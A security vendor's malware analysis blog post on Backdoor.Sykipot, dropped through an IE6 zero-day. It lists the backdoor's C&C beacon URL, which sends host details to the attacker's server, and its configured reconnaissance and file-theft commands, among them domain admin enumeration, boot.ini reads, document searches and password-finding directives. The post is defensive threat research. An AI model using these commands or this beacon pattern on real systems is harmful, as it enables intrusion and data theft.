Following our blog, Zero-Day Attack on IE6 – JS.Sykipot Doesn’t Spare Retired Software, covering the recent IE Zero-day, we thought it might be interesting to look at an attack in the wild using this vulnerability and the resulting payload.
In what is thought to be a targeted attack, the targets were duped into visiting the site Topix21century.com, which was recently registered on March 6, 2010. Once the site is visited and the target is exploited using JS.Sykipot, they find themselves with Backdoor.Sykipot installed on their system. Backdoor.Sykipot's main aim seems to be gathering of system information and sending it back to the command & control (C&C) server hosted on topix21century.com. The gathering of system information in this case is probably just one stage in the overall attack. To achieve its goal, Backdoor.Sykipot creates the following files in the %Temp% folder.
- Gnotes.dat – An encrypted configuration data file downloaded from the C&C server.
- Tgnotes.dat – A decrypted, plain-text version of Gnotes.dat.
- Pnotes.dat – A plain-text version of information gathered.
- Tpnotes.dat – An encrypted version of Pnotes.dat sent back to the C&C server.
These files are used for receiving commands and sending back the command results to the C&C server. Each time Backdoor.Sykipot connects back to the C&C server and uploads the file Tpnotes.dat, it deletes the four files and gets a new configuration file by sending an HTTPS request to notes.topix21century.com with the following info:
URL: https://notes.topix21century.com/asp/kys_allow_get.asp?name=getky&hostname=[COMPUTER NAME]-[ID ADDRESS]-notes
Referrer: http://www.yahoo.com/
Version: HTTP/1.0
Our analysis has shown that there are two different versions of the configuration file, Gnotes.dat, being downloaded from topix21century.com. Each configuration file executes system commands and saves the information before uploading it to topix21century.com.
Gnotes.dat version 1 commands
- getfile:
- putfile:
- door:
- findpass2000
- cmd:
- ipconfig /all
- netstat -ano
- net start
- net group "domain admins" /domain
- tasklist /v
- dir c:\*.url /s
- net localgroup administrators
- type c:\boot.ini
- systeminfo
- time:
- 300000
Gnotes.dat version 2 commands
- getfile:
- putfile:
- door:
- findpass2000
- cmd:
- ipconfig /all
- netstat –ano
- net start
- net group "domain admins" /domain
- tasklist /v
- dir c:\*.url /s
- dir c:\*.pdf /s
- dir c:\*.doc /s
- net localgroup administrators
- type c:\boot.ini
- systeminfo
- time:
- 300000
Since there is a lot of information sent back to the C&C server, we will just show one example below. Part of the results from the command ‘Systeminfo’ shows what Hotfixes have been installed on the compromised computer, leaving the attacker with valuable information as to what vulnerabilities might still exist on the system.
Hotfix(s): 7 Hotfix(s) Installed.
[01]: File 1
[02]: File 1
[03]: File 1
[04]: Q147222
[05]: KB884020 - Update
[06]: KB942288-v3 - Update
[07]: KB958644 - Update
The information being gathered from both configuration files can help the attacker determine if the compromised system is worthy of continued exploration and how they might continue with their attack. Future attacks using this information could involve additional malware being downloaded onto the compromised computer to aid attackers in stealing confidential information.